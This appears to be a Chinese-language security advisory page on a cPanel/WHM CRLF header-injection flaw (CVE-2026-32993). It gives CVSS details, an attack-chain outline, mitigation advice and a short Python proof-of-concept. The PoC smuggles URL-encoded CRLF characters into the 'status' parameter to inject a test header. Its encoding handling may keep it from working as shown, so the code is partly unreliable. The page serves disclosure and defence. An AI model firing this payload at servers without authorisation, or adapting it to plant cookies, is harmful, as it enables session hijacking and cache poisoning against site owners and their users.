IPBUF安全漏洞报告
English
CVE-2026-32993 CVSS 8.3 高危

CVE-2026-32993 cPanel HTTP响应头注入漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-32993
漏洞类型
HTTP响应头注入 (CRLF注入)
CVSS评分
8.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
cPanel / WHM

相关标签

CRLF注入cPanelHTTP头注入高危漏洞无需认证

漏洞概述

CVE-2026-32993是cPanel/WHM中发现的一个高危安全漏洞。由于/unprotected/nova_error端点对status查询参数的过滤不当,未经身份验证的远程攻击者可利用此漏洞向HTTP响应中注入任意头部信息。该漏洞CVSS评分达8.3,无需用户交互即可被利用,可能导致缓存投毒、XSS攻击或会话劫持等严重后果。

技术细节

该漏洞的根源在于cPanel/WHM的/unprotected/nova_error接口在处理错误状态码时,直接将用户可控的status参数拼接到HTTP响应头中,且未对换行符(CRLF,\r\n)进行有效的转义或过滤。攻击者可以通过发送包含%0d%0a(URL编码的CRLF)的特制GET请求,突破HTTP头的结构限制,注入恶意的Header字段(如Set-Cookie或X-Forwarded-For)。由于CVSS向量为AV:N/AC:L/PR:N/UI:N/S:C,攻击者无需任何权限即可通过网络发起攻击,且利用范围可扩散至其他组件。成功的注入可能导致客户端安全机制失效,为后续攻击铺平道路。

攻击链分析

STEP 1
1. 侦察
攻击者识别出目标服务器运行cPanel/WHM,并确认/unprotected/nova_error端点可访问。
STEP 2
2. 构造载荷
攻击者构造包含CRLF字符(%0d%0a)的恶意status参数,意图注入自定义HTTP头(如Set-Cookie)。
STEP 3
3. 发送请求
攻击者向目标端点发送包含恶意payload的HTTP GET请求,无需身份验证。
STEP 4
4. 注入执行
服务器解析请求时未过滤特殊字符,将恶意内容写入响应头,返回给客户端。
STEP 5
5. 利用后果
客户端接收包含恶意头的响应,可能导致XSS、缓存投毒或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_cve_2026_32993(target_url): """Check for CVE-2026-32993 HTTP Header Injection""" vuln_url = f"{target_url}/unprotected/nova_error" # Payload injects CRLF followed by a custom test header # %0d%0a represents CRLF characters payload = "200 OK%0d%0aX-CVE-2026-Test: header_injected" try: response = requests.get(vuln_url, params={"status": payload}, timeout=5) # Verify if the arbitrary header was reflected in the response if "X-CVE-2026-Test" in response.headers: print(f"[+] Target {target_url} is VULNERABLE!") print(f"[+] Injected Header Found: {response.headers['X-CVE-2026-Test']}") return True else: print(f"[-] Target {target_url} appears safe or patched.") return False except Exception as e: print(f"[!] Error connecting to target: {e}") return False # Usage # target = "http://example.com:2082" # check_cve_2026_32993(target)

影响范围

cPanel/WHM < 2026年5月13日安全补丁版本

防御指南

临时缓解措施
如果无法立即更新,建议限制对/unprotected/nova_error端点的网络访问,或部署WAF规则以检测和阻断包含CRLF注入特征的HTTP请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表